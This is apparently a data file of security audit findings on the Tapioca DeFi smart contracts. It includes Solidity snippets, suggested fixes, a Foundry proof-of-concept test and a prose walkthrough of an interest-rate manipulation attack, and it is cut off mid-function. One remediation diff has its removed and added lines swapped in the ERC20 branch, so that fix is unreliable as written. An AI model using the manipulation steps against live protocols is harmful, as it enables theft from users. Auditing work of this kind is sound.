This will make more rewards than the expected ones to be distributed because `usdoSupply` will be way smaller than `totalUsdoDebt`.\\nConsider the following scenario: 1000 USDO are borrowed, and already 50 USDO have been accrued as debt.\\nThis makes USDO's totalSupply() be 1000, while `totalUsdoDebt` will be 1050 USDO. If `mintOpenInterestDebt()` is called, 50 USDO should be minted and distributed among twTap holders.\\nHowever, prior to executing `mintOpenInterestDebt()`, a user bridges 100 USDO from chain B, making the total supply increment from 1000 USDO to 1100 USDO. Now, totalSupply() is 1100 USDO, while `totalUsdoDebt` is still 1050, making rewards not be distributed among users because `totalUsdoDebt` < usdoSupply.чOne of the possible fixes for this issue is to track debt with a storage variable. Every time a repay is performed, the difference between elastic and base could be accrued to the variable, and such variable could be decremented when the fee distributions are performed. This makes it easier to compute the actual rewards and mitigates the cross-chain issue.чMedium. 
The fees to be distributed in twTap are likely to always be wrong, making one of the core governance functionalities (locking TAP in order to participate in Tapioca's governance) be broken given that fee distributions (and thus the incentives to participate in governance) won't be correct.ч```\\nfunction mintOpenInterestDebt(address twTap) external onlyOwner { \\n uint256 usdoSupply = usdoToken.totalSupply();\\n\\n // nothing to mint when there's no activity\\n if (usdoSupply > 0) { \\n // re-compute latest debt\\n uint256 totalUsdoDebt = computeTotalDebt(); \\n \\n //add Origins debt \\n //Origins market doesn't accrue in time but increases totalSupply\\n //and needs to be taken into account here\\n uint256 len = allOriginsMarkets.length;\\n for (uint256 i; i < len; i++) {\\n IMarket market = IMarket(allOriginsMarkets[i]);\\n if (isOriginRegistered[address(market)]) {\\n (uint256 elastic,) = market.totalBorrow();\\n totalUsdoDebt += elastic;\\n }\\n }\\n \\n //debt should always be > USDO supply\\n if (totalUsdoDebt > usdoSupply) { \\n uint256 _amount = totalUsdoDebt - usdoSupply;\\n\\n //mint against the open interest; supply should be fully minted now\\n IUsdo(address(usdoToken)).mint(address(this), _amount);\\n\\n //send it to twTap\\n uint256 rewardTokenId = ITwTap(twTap).rewardTokenIndex(address(usdoToken));\\n _distributeOnTwTap(_amount, rewardTokenId, address(usdoToken), ITwTap(twTap));\\n }\\n } \\n }\\n```\\n -USDO's MSG_TAP_EXERCISE compose messages where exercised options must be withdrawn to another chain will always fail due to wrongly requiring sendParam's to address to be whitelisted in the ClusterчmediumчWrongly checking for the sendParam's `to` address `to` be whitelisted when bridging exercised options will make such calls always fail.\\nOne of the compose messages allowed in USDO is `MSG_TAP_EXERCISE`. 
This type of message will trigger UsdoOptionReceiverModule's `exerciseOptionsReceiver()` function, which allows users to exercise their options and obtain the corresponding exercised tapOFTs.\\nUsers can choose to obtain their tapOFTs in the chain where `exerciseOptionsReceiver()` is being executed, or they can choose to send a message to a destination chain of their choice. If users decide to bridge the exercised option, the `lzSendParams` fields contained in the `ExerciseOptionsMsg` struct decoded from the `_data` passed as parameter in `exerciseOptionsReceiver()` should be filled with the corresponding data to perform the cross-chain call.\\nThe problem is that the `exerciseOptionsReceiver()` performs an unnecessary validation that requires the `to` parameter inside the `lzSendParams` `to` be whitelisted in the protocol's cluster:\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); // <---- This validation is wrong \\n // rest of code\\n \\n \\n }\\n```\\n\\n`msg_.lzSendParams.sendParam.to` corresponds to the address that will obtain the tokens in the destination chain after bridging the exercised option, which can and should actually be any address that the user exercising the option decides, so this address shouldn't be required to be whitelisted in the protocol's Cluster (given that the Cluster only whitelists certain protocol-related addresses such as contracts or special addresses).\\nBecause of this, transactions where users try to bridge the exercised options will always fail because the `msg_.lzSendParams.sendParam.to` address specified by users will never be whitelisted in the Cluster.чRemove the whitelist check 
against the `msg_.lzSendParams.sendParam.to` param inexerciseOptionsReceiver():\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n// Remove the line below\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); \\n // rest of code\\n \\n \\n }\\n```\\nчHigh. The functionality of exercising options and bridging them in the same transaction is one of the wide range of core functionalities that should be completely functional in Tapioca. However, this functionality will always fail due to the mentioned issue, forcing users to only be able to exercise options in the same chain.ч```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); // <---- This validation is wrong \\n // rest of code\\n \\n \\n }\\n```\\n -Withdrawing to other chain when exercising options won't work as expected, leading to DoSчmediumчWithdrawing to another chain when exercising options will always fail because the implemented functionality does not bridge the tokens exercised in the option, and tries to perform a regular cross-chain call instead.\\nTapioca incorporates a DAO Share Options (DSO) program where users can lock USDO in order to obtain TAP tokens at a discounted price.\\nIn order to exercise their options, users need to execute a compose call with a message type of `MSG_TAP_EXERCISE`, which will trigger the UsdoOptionReceiverModule's `exerciseOptionsReceiver()` 
function.\\nWhen exercising their options, users can decide to bridge the obtained TAP tokens into another chain by setting the `msg_.withdrawOnOtherChain` to true:\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n \\n // rest of code \\n \\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token \\n _options.tapAmount \\n ); \\n \\n // rest of code\\n \\n address tapOft = ITapiocaOptionBroker(_options.target).tapOFT();\\n if (msg_.withdrawOnOtherChain) {\\n // rest of code \\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from); \\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n } else {\\n //send on this chain\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount);\\n }\\n }\\n } \\n```\\n\\nAs the code snippet shows, `exerciseOptionsReceiver()` will perform mainly 2 steps:\\nExercise the option by calling `_options.target.exerciseOption()` . This will make USDO tokens serving as a payment for the `tapOft` tokens be transferred from the user, and in exchange the corresponding option `tapOft` tokens will be transferred to the USDO contract so that they can later be transferred to the user.\\nTAP tokens will be sent to the user. 
This can be done in two ways:\\nIf the user doesn't decide to bridge them (by leaving `msg_.withdrawOnOtherChain` as false), the `tapOft` tokens will simply be transferred to the `_options.from` address, succesfully exercising the option\\nOn the other hand, if the user decides to bridge the exercised option, the internal `_sendPacket()` function will be triggered, which will perform a call via LayerZero to the destination chain:\\n`// UsdoOptionReceiverModule.sol\\n\\nfunction _sendPacket(LZSendParam memory _lzSendParam, bytes memory _composeMsg, address _srcChainSender)\\n private\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n /// @dev Applies the token transfers regarding this send() operation.\\n // - amountDebitedLD is the amount in local decimals that was ACTUALLY debited from the sender.\\n // - amountToCreditLD is the amount in local decimals that will be credited to the recipient on the remote OFT instance.\\n (uint256 amountDebitedLD, uint256 amountToCreditLD) =\\n _debit(_lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid);\\n \\n /// @dev Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) = _buildOFTMsgAndOptionsMemory(\\n _lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD, _srcChainSender\\n );\\n \\n /// @dev Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n /// @dev Formulate the OFT receipt.\\n oftReceipt = OFTReceipt(amountDebitedLD, amountToCreditLD);\\n\\n emit OFTSent(msgReceipt.guid, _lzSendParam.sendParam.dstEid, msg.sender, amountDebitedLD);\\n }`\\nThe problem with the approach followed when users want to bridge the exercised options is that the contract will not actually bridge the exercised `tapOft` tokens by 
calling the tapOft's `sendPacket()` function (which is the actual way by which the token can be transferred cross-chain). Instead, the contract calls `_sendPacket()` , a function that will try to perform a USDO cross-chain call (instead of a `tapOft` cross-chain call). This will make the `_debit()` function inside `_sendPacket()` be executed, which will try to burn USDO tokens from the msg.sender:\\n```\\n// OFT.sol \\n\\nfunction _debit(\\n uint256 _amountLD, \\n uint256 _minAmountLD,\\n uint32 _dstEid\\n ) internal virtual override returns (uint256 amountSentLD, uint256 amountReceivedLD) {\\n (amountSentLD, amountReceivedLD) = _debitView(_amountLD, _minAmountLD, _dstEid);\\n \\n // @dev In NON-default OFT, amountSentLD could be 100, with a 10% fee, the amountReceivedLD amount is 90,\\n // therefore amountSentLD CAN differ from amountReceivedLD.\\n \\n // @dev Default OFT burns on src.\\n _burn(msg.sender, amountSentLD);\\n }\\n```\\n\\nThis leads to two possible outcomes:\\n`msg.sender` (the LayerZero endpoint) has enough `amountSentLD` of USDO tokens to be burnt. In this situation, USDO tokens will be incorrectly burnt from the user, leading to a loss of balance for him. After this, the burnt USDO tokens will be bridged. This outcome greatly affect the user in two ways:\\nUSDO tokens are incorrectly burnt from his balance\\nThe exercised `tapOft` tokens remain stuck forever in the USDO contract because they are never actually bridged\\nThe most probable: `msg.sender` (LayerZero endpoint) does not have enough `amountSentLD` of USDO tokens to be burnt. In this case, an error will be thrown and the whole call will revert, leading to a DoS\\nProof of Concept\\nThe following poc shows how the function will be DoS'ed due to the sender not having enough USDO to be burnt. 
In order to execute the Poc, perform the following steps:\\nRemove the `_checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to));` line in UsdoOptionReceiverModule.sol's `exerciseOptionsReceiver()` function (it is wrong and related to another vulnerability)\\nPaste the following code in Tapioca-bar/test/Usdo.t.sol:\\n`// Usdo.t.sol\\n\\nfunction testVuln_exercise_option() public {\\n uint256 erc20Amount_ = 1 ether;\\n\\n //setup\\n {\\n deal(address(aUsdo), address(this), erc20Amount_);\\n\\n // @dev send TAP to tOB\\n deal(address(tapOFT), address(tOB), erc20Amount_);\\n\\n // @dev set `paymentTokenAmount` on `tOB`\\n tOB.setPaymentTokenAmount(erc20Amount_);\\n }\\n \\n //useful in case of withdraw after borrow\\n LZSendParam memory withdrawLzSendParam_;\\n MessagingFee memory withdrawMsgFee_; // Will be used as value for the composed msg\\n\\n {\\n // @dev `withdrawMsgFee_` is to be airdropped on dst to pay for the send to source operation (B->A).\\n PrepareLzCallReturn memory prepareLzCallReturn1_ = usdoHelper.prepareLzCall( // B->A data\\n IUsdo(address(bUsdo)),\\n PrepareLzCallData({\\n dstEid: aEid,\\n recipient: OFTMsgCodec.addressToBytes32(address(this)),\\n amountToSendLD: erc20Amount_,\\n minAmountToCreditLD: erc20Amount_,\\n msgType: SEND,\\n composeMsgData: ComposeMsgData({\\n index: 0,\\n gas: 0,\\n value: 0,\\n data: bytes(\"\"),\\n prevData: bytes(\"\"),\\n prevOptionsData: bytes(\"\")\\n }),\\n lzReceiveGas: 500_000,\\n lzReceiveValue: 0\\n })\\n );\\n withdrawLzSendParam_ = prepareLzCallReturn1_.lzSendParam;\\n withdrawMsgFee_ = prepareLzCallReturn1_.msgFee;\\n }\\n\\n /**\\n * Actions\\n */\\n uint256 tokenAmountSD = usdoHelper.toSD(erc20Amount_, aUsdo.decimalConversionRate());\\n\\n //approve magnetar\\n ExerciseOptionsMsg memory exerciseMsg = ExerciseOptionsMsg({\\n optionsData: IExerciseOptionsData({\\n from: address(this),\\n target: address(tOB), \\n paymentTokenAmount: tokenAmountSD,\\n oTAPTokenID: 0, // @dev 
ignored in TapiocaOptionsBrokerMock\\n tapAmount: tokenAmountSD\\n }),\\n withdrawOnOtherChain: true,\\n lzSendParams: LZSendParam({\\n sendParam: SendParam({\\n dstEid: 0,\\n to: \"0x\",\\n amountLD: erc20Amount_,\\n minAmountLD: erc20Amount_,\\n extraOptions: \"0x\",\\n composeMsg: \"0x\",\\n oftCmd: \"0x\"\\n }),\\n fee: MessagingFee({nativeFee: 0, lzTokenFee: 0}),\\n extraOptions: \"0x\",\\n refundAddress: address(this)\\n }),\\n composeMsg: \"0x\"\\n });\\n bytes memory sendMsg_ = usdoHelper.buildExerciseOptionMsg(exerciseMsg);\\n\\n PrepareLzCallReturn memory prepareLzCallReturn2_ = usdoHelper.prepareLzCall(\\n IUsdo(address(aUsdo)),\\n PrepareLzCallData({\\n dstEid: bEid,\\n recipient: OFTMsgCodec.addressToBytes32(address(this)),\\n amountToSendLD: erc20Amount_,\\n minAmountToCreditLD: erc20Amount_,\\n msgType: PT_TAP_EXERCISE,\\n composeMsgData: ComposeMsgData({\\n index: 0,\\n gas: 500_000,\\n value: uint128(withdrawMsgFee_.nativeFee),\\n data: sendMsg_,\\n prevData: bytes(\"\"),\\n prevOptionsData: bytes(\"\")\\n }),\\n lzReceiveGas: 500_000,\\n lzReceiveValue: 0\\n })\\n );\\n bytes memory composeMsg_ = prepareLzCallReturn2_.composeMsg;\\n bytes memory oftMsgOptions_ = prepareLzCallReturn2_.oftMsgOptions;\\n MessagingFee memory msgFee_ = prepareLzCallReturn2_.msgFee;\\n LZSendParam memory lzSendParam_ = prepareLzCallReturn2_.lzSendParam;\\n\\n (MessagingReceipt memory msgReceipt_,) = aUsdo.sendPacket{value: msgFee_.nativeFee}(lzSendParam_, composeMsg_);\\n\\n {\\n verifyPackets(uint32(bEid), address(bUsdo));\\n\\n vm.expectRevert(\"ERC20: burn amount exceeds balance\");\\n this.lzCompose(\\n bEid,\\n address(bUsdo),\\n oftMsgOptions_,\\n msgReceipt_.guid,\\n address(bUsdo),\\n abi.encodePacked(\\n OFTMsgCodec.addressToBytes32(address(this)), composeMsg_\\n )\\n ); \\n\\n }\\n\\n }`\\nRun the poc with the following command, inside the Tapioca-bar repo: `forge test --mt testVuln_exercise_option`\\nWe can see how the \"ERC20: burn amount exceeds balance\" 
error is thrown due to the issue mentioned in the report.чIf users decide to bridge their exercised tapOft, the sendPacket() function incorporated in the tapOft contract should be used instead of UsdoOptionReceiverModule's internal _sendPacket() function, so that the actual bridged asset is the tapOft and not the USDO.чHigh. As demonstrated, two critical outcomes might affect the user:\\n`tapOft` funds will remain stuck forever in the USDO contract and USDO will be incorrectly burnt from `msg.sender`\\nThe core functionality of exercising and bridging options always reverts and effectively causes a DoS.ч```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n \\n // rest of code \\n \\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token \\n _options.tapAmount \\n ); \\n \\n // rest of code\\n \\n address tapOft = ITapiocaOptionBroker(_options.target).tapOFT();\\n if (msg_.withdrawOnOtherChain) {\\n // rest of code \\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from); \\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n } else {\\n //send on this chain\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount);\\n }\\n }\\n } \\n```\\n -Not considering fees when wrapping mtOFTs leads to DoS in leverage executorsчmediumчWhen wrapping mtOFTs in leverage executors, fees are not considered, making calls always revert because the obtained assets amount is always smaller than expected.\\nTapioca will allow tOFTs and mtOFTs to act as collateral in some of Tapioca's markets, as described by the documentation. 
Although regular tOFTs don't hardcode fees to 0, meta-tOFTs (mtOFTs) could incur a fee when wrapping, as shown in the following code snippet, where `_checkAndExtractFees()` is used to calculate a fee considering the wrapped _amount:\\n```\\n// mTOFT.sol\\n\\nfunction wrap(address _fromAddress, address _toAddress, uint256 _amount)\\n external\\n payable \\n whenNotPaused\\n nonReentrant\\n returns (uint256 minted)\\n {\\n // rest of code\\n \\n uint256 feeAmount = _checkAndExtractFees(_amount);\\n if (erc20 == address(0)) {\\n _wrapNative(_toAddress, _amount, feeAmount);\\n } else { \\n if (msg.value > 0) revert mTOFT_NotNative();\\n _wrap(_fromAddress, _toAddress, _amount, feeAmount);\\n }\\n\\n return _amount - feeAmount;\\n } \\n```\\n\\nWhen fees are applied, the amount of `mtOFTs` minted to the caller won't be the full `_amount`, but the `_amount - feeAmount`.\\nTapioca's leverage executors are required to wrap/unwrap assets when tOFTs are used as collateral in order to properly perform their logic. The problem is that leverage executors don't consider the fact that if collateral is an `mtOFT`, then a fee could be applied.\\nLet's consider the `BaseLeverageExecutor` ****contract (who whas the `_swapAndTransferToSender()` function, called by all leverage executors):\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData)); \\n \\n // rest of code\\n \\n // If the tokenOut is a tOFT, wrap it. Handles ETH and ERC20.\\n // If `sendBack` is true, wrap the `amountOut to` the sender. 
else, wrap it to this contract.\\n if (swapData.toftInfo.isTokenOutToft) { \\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } \\n```\\n\\nAs we can see in the code snippet, if the user requires to wrap the obtained swapped assets by setting `swapData.toftInfo.isTokenOutToft` to `true`, then the internal `_handleToftWrapToSender()` function will be called. This function will wrap the tOFT (or mtOFT) and send it to `msg.sender` or `address(this)`, depending on the user's `sendBack` input:\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _handleToftWrapToSender(bool sendBack, address tokenOut, uint256 amountOut) internal {\\n address toftErc20 = ITOFT(tokenOut).erc20();\\n address wrapsTo = sendBack == true ? msg.sender : address(this);\\n\\n if (toftErc20 == address(0)) {\\n // If the tOFT is for ETH, withdraw from WETH and wrap it.\\n weth.withdraw(amountOut);\\n ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n } else {\\n // If the tOFT is for an ERC20, wrap it.\\n toftErc20.safeApprove(tokenOut, amountOut);\\n ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n toftErc20.safeApprove(tokenOut, 0);\\n }\\n }\\n```\\n\\nThe problem here is that if `tokenOut` is an mtOFT, then a fee might be applied when wrapping. 
However, this function does not consider the `wrap()` function return value (which as shown in the first code snippet in this report, whill return the actual minted amount, which is always `_amount - feeAmount` ).\\nThis leads to a vulnerability where contracts performing this wraps will believe they have more funds than the intended, leading to a Denial of Service and making the leverage executors never work with mtOFTs.\\nLet's say a user wants to lever up by calling BBLeverage.sol's `buyCollateral()` function:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n \\n\\n // rest of code\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max); \\n \\n \\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); \\n address(asset).safeApprove(address(yieldBox), 0); \\n \\n // rest of code\\n } \\n```\\n\\nAs we can see, the contract will call `leverageExecutor.getCollateral()` in order to perform the swap. Notice how the value returned by `getCollateral()` will be stored in the amountOut variable, which will later be converted to `collateralShare` and deposited into the `yieldBox`.\\nLet's say the `leverageExecutor` in this case is the `SimpleLeverageExecutor.sol` contract. 
When `getCollateral()` is called, `SimpleLeverageExecutor` will directly return the value returned by the internal `_swapAndTransferToSender()` function:\\n`// `SimpleLeverageExecutor.sol`\\n\\nfunction getCollateral( \\n address assetAddress,\\n address collateralAddress,\\n uint256 assetAmountIn,\\n bytes calldata swapperData \\n ) external payable override returns (uint256 collateralAmountOut) {\\n // Should be called only by approved SGL/BB markets.\\n if (!cluster.isWhitelisted(0, msg.sender)) revert SenderNotValid();\\n return _swapAndTransferToSender(true, assetAddress, collateralAddress, assetAmountIn, swapperData);\\n } `\\nAs seen in the report, `_swapAndTransferToSender()` won't return the amount swapped and wrapped, and will instead only return the amount obtained when swapping, assuming that wraps will always mint the same amount:\\n`// BaseLeverageExecutor.sol\\n\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n \\n ...\\n \\n amountOut = swapper.swap(swapperData, amountIn, swapData.minAmountOut);\\n \\n ...\\n if (swapData.toftInfo.isTokenOutToft) { \\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } `\\nIf the tokenOut is an mtOFT, the actual obtained amount will be smaller than the `amountOut` stored due to the fees that might be applied.\\nThis makes the `yieldBox.depositAsset()` in `BBLeverage.sol` inevitably always fail due to not having enough funds to deposit into the YieldBox effectively causing a Denial of ServiceчConsider the fees applied when wrapping assets by following OFT's API, and store the returned value by `wrap()`. 
For example, `_handleToftWrapToSender()` could return an integer with the actual amount obtained after wrapping:\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _handleToftWrapToSender(bool sendBack, address tokenOut, uint256 amountOut) internal returns(uint256 _amountOut) {\\n address toftErc20 = ITOFT(tokenOut).erc20();\\n address wrapsTo = sendBack == true ? msg.sender : address(this);\\n\\n if (toftErc20 == address(0)) {\\n // If the tOFT is for ETH, withdraw from WETH and wrap it.\\n weth.withdraw(amountOut);\\n// Remove the line below\\n ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n// Add the line below\\n _amountOut = ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n } else {\\n // If the tOFT is for an ERC20, wrap it.\\n toftErc20.safeApprove(tokenOut, amountOut);\\n// Remove the line below\\n _amountOut = ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n// Add the line below\\n ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n toftErc20.safeApprove(tokenOut, 0);\\n }\\n }\\n```\\n\\nAnd this value should be the one stored in _swapAndTransferToSender()'s amountOut:\\n```\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData)); \\n \\n // rest of code\\n \\n // If the tokenOut is a tOFT, wrap it. Handles ETH and ERC20.\\n // If `sendBack` is true, wrap the `amountOut to` the sender. 
else, wrap it to this contract.\\n if (swapData.toftInfo.isTokenOutToft) { \\n// Remove the line below\\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n// Add the line below\\n amountOut = _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } \\n```\\nчHigh. The core functionality of leverage won't work if the tokens are mtOFT tokens.ч```\\n// mTOFT.sol\\n\\nfunction wrap(address _fromAddress, address _toAddress, uint256 _amount)\\n external\\n payable \\n whenNotPaused\\n nonReentrant\\n returns (uint256 minted)\\n {\\n // rest of code\\n \\n uint256 feeAmount = _checkAndExtractFees(_amount);\\n if (erc20 == address(0)) {\\n _wrapNative(_toAddress, _amount, feeAmount);\\n } else { \\n if (msg.value > 0) revert mTOFT_NotNative();\\n _wrap(_fromAddress, _toAddress, _amount, feeAmount);\\n }\\n\\n return _amount - feeAmount;\\n } \\n```\\n -Secondary Big Bang market rates can be manipulated due to not triggering penrose.reAccrueBigBangMarkets(); when leveragingчmediumчSecondary market rates can still be manipulated via leverage executors because `penrose.reAccrueBigBangMarkets()` is never called in the leverage module.\\nThe attack described in Tapioca's C4 audit 1561 issue and also described in Spearbit's audit 5.2.16 issue is still possible utilizing the leverage modules.\\nAs a summary, these attacks described a way to manipulate interest rates. As stated in Tapioca's documentation, the interest rate for non-ETH markets is computed considering the current debt in ETH markets. Rate manipulation could be performed by an attacker following these steps:\\nBorrow a huge amount in the ETH market. This step did not accrue the other markets.\\nAccrue other non-ETH markets. 
It is important to be aware of the fact that non-ETH markets base their interest calculations considering the total debt in the ETH market. After step 1, the attacker triggers an accrual on non-ETH markets which will fetch the data from the greatly increased borrow amount in the ETH market, making the non-ETH market see a huge amount of debt, thus affecting and manipulating the computation of its interest rate.\\nThe fix introduced in the C4 and Spearbit audits incorporated a new function in the Penrose contract to mitigate this issue. If the caller is the `bigBangEthMarket`, then the internal `_reAccrueMarkets()` function will be called, and market's interest rates will be accrued prior to performing any kind of borrow. Following this fix, an attacker can no longer perform step 2 of accruing the markets with a manipulated rate because accrual on secondary markets has already been triggered.\\n```\\n// Penrose.sol\\n\\nfunction reAccrueBigBangMarkets() external notPaused {\\n if (msg.sender == bigBangEthMarket) {\\n _reAccrueMarkets(false);\\n } \\n }\\n \\n function _reAccrueMarkets(bool includeMainMarket) private {\\n uint256 len = allBigBangMarkets.length;\\n address[] memory markets = allBigBangMarkets;\\n for (uint256 i; i < len; i++) {\\n address market = markets[i];\\n if (isMarketRegistered[market]) {\\n if (includeMainMarket || market != bigBangEthMarket) {\\n IBigBang(market).accrue();\\n }\\n }\\n }\\n\\n emit ReaccruedMarkets(includeMainMarket);\\n }\\n```\\n\\nAlthough this fix is effective, the attack is still possible via Big Bang's leverage modules. Leveraging is a different way of borrowing that still affects a market's total debt. 
As we can see, the `buyCollateral()` function still performs a `_borrow()`, thus incrementing a market's debt:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n {\\n (, uint256 borrowShare) = _borrow( \\n calldata_.from, \\n address(this), \\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n ); \\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n \\n // rest of code\\n }\\n```\\n\\nBecause Penrose's `reAccrueBigBangMarkets()` function is not called when leveraging, the attack described in the C4 and Spearbit audits is still possible by utilizing leverage to increase the ETH market's total debt, and then accruing non-ETH markets so that rates are manipulated.чIt is recommended to trigger Penrose's reAccrueBigBangMarkets() function when interacting with Big Bang's leverage modules, so that the issue can be fully mitigated.чMedium. 
A previously found issue is still present in the codebase which allows secondary Big Bang markets interest rates to be manipulated, allowing the attacker to perform profitable strategies and potentially affecting users.ч```\\n// Penrose.sol\\n\\nfunction reAccrueBigBangMarkets() external notPaused {\\n if (msg.sender == bigBangEthMarket) {\\n _reAccrueMarkets(false);\\n } \\n }\\n \\n function _reAccrueMarkets(bool includeMainMarket) private {\\n uint256 len = allBigBangMarkets.length;\\n address[] memory markets = allBigBangMarkets;\\n for (uint256 i; i < len; i++) {\\n address market = markets[i];\\n if (isMarketRegistered[market]) {\\n if (includeMainMarket || market != bigBangEthMarket) {\\n IBigBang(market).accrue();\\n }\\n }\\n }\\n\\n emit ReaccruedMarkets(includeMainMarket);\\n }\\n```\\n -`TOFTMarketReceiverModule::marketBorrowReceiver` flow is brokenчmediumчThe `TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken and will revert when the Magnetar contract tries to transfer the ERC1155 tokens to the Market contract.\\n`TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken.\\nLet's examine it more closely:\\nAfter checking the whitelisting status for the `marketHelper`, `magnetar` and the `market` contracts an approval is made to the Magnetar contract.\\n`MagnetarCollateralModule::depositAddCollateralAndBorrowFromMarket` get called with the passed parameters.\\nIf the `data.deposit` is true, the Magnetar contract will call `_extractTokens` with the following params: `from = msg_.user`, `token = collateralAddress` and `amount = msg_.collateralAmount`.\\n```\\n function _extractTokens(address _from, address _token, uint256 _amount) internal returns (uint256) {\\n uint256 balanceBefore = IERC20(_token).balanceOf(address(this));\\n // IERC20(_token).safeTransferFrom(_from, address(this), _amount);\\n pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);\\n uint256 balanceAfter = 
